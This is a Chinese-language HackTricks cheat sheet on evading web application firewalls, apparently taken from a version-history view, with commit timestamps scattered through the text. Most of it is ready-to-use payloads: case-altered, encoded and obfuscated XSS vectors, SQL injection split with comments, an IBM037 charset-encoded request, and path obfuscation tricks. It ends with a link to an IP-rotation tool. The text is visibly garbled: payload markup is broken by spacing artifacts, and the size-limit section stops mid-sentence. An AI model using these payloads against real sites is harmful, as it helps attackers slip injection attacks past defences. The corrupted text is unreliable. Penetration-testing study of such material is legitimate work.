2023-12-24 18:22:05 +00:00
# WAF 绕过
2022-06-22 22:03:55 +00:00
< details >
2023-12-31 02:59:27 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-06-22 22:03:55 +00:00
2023-12-31 02:59:27 +00:00
其他支持 HackTricks 的方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFTs 集合** ](https://opensea.io/collection/the-peass-family )
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram 群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来**分享您的黑客技巧**。
2022-06-22 22:03:55 +00:00
< / details >
2023-08-03 19:12:22 +00:00
## 正则表达式绕过
2023-12-24 18:22:05 +00:00
可以使用不同的技术来绕过防火墙上的正则表达式过滤器。示例包括交替大小写、添加换行符和编码有效载荷。可以在 [PayloadsAllTheThings ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads ) 和 [OWASP ](https://cheatsheetseries.owasp.org/cheatsheets/XSS\_Filter\_Evasion\_Cheat\_Sheet.html ) 找到各种绕过的资源。下面的示例摘自[这篇文章](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2)。
2022-06-22 22:03:55 +00:00
```bash
2023-06-01 03:00:55 +00:00
< sCrIpT > alert ( XSS )</ sCriPt > #changing the case of the tag
< < script > alert ( XSS )</ script > #prepending an additional "< "
< script > alert(XSS) // #removing the closing tag
< script > alert `XSS` </ script > #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
< iframe src = http://malicous.com < #double open angle brackets
< STYLE >. classname { background-image : url ( "javascript:alert(XSS)" );}</ STYLE > #uncommon tags
< img / src = 1/onerror=alert(0) > #bypass space filter by using / where a space is expected
< a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href = javascript:alert(1) > xss</ a > #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
< iframe src = "javascript:alert(`xss`)" > #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
2023-08-03 19:12:22 +00:00
< a src = "%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)" > #Using Line Feed (LF) line breaks
2023-06-01 03:00:55 +00:00
< BODY onload !#$%&()*~+ -_ ., : ;?@[/| \]^`= confirm () > # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
```
2023-08-03 19:12:22 +00:00
## 字符集编码
2023-06-01 03:00:55 +00:00
```bash
2022-06-22 22:03:55 +00:00
# Charset encoding
application/x-www-form-urlencoded;charset=ibm037
multipart/form-data; charset=ibm037,boundary=blah
multipart/form-data; boundary=blah; charset=ibm037
##Python code
import urllib
s = 'payload'
2023-08-03 19:12:22 +00:00
print(urllib.parse.quote_plus(s.encode("IBM037")))
2022-06-22 22:03:55 +00:00
## Request example
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61
%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3& x=L%A7n
```
2023-08-03 19:12:22 +00:00
## 混淆
2023-06-01 03:00:55 +00:00
```bash
# IIS, ASP Clasic
< %s%cr%u0131pt> == < script >
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
```
2023-12-24 18:22:05 +00:00
## Unicode 兼容性
2023-12-31 02:59:27 +00:00
根据 Unicode 正规化的实现方式(更多信息请见[此处](https://jlajara.gitlab.io/Bypass_WAF_Unicode)),共享 Unicode 兼容性的字符可能能够绕过 WAF 并执行预期的有效载荷。兼容字符可以在[这里](https://www.compart.com/en/unicode)找到。
2023-06-01 03:00:55 +00:00
2023-08-03 19:12:22 +00:00
### 示例
2023-06-01 03:00:55 +00:00
```bash
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
< ' ' <
```
2023-12-24 18:22:05 +00:00
## 超出大小限制
在基于云的WAF中, ,
### IP轮换
2023-06-01 03:00:55 +00:00
2023-12-24 18:22:05 +00:00
* [https://github.com/rootcathacking/catspin ](https://github.com/rootcathacking/catspin )
2022-06-22 22:03:55 +00:00
< details >
2023-12-31 02:59:27 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ! < / strong > < / summary >
其他支持HackTricks的方式:
2022-06-22 22:03:55 +00:00
2023-12-31 02:59:27 +00:00
* 如果你想在**HackTricks中看到你的公司广告**或者**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库**提交PR来分享你的黑客技巧**。
2022-06-22 22:03:55 +00:00
< / details >
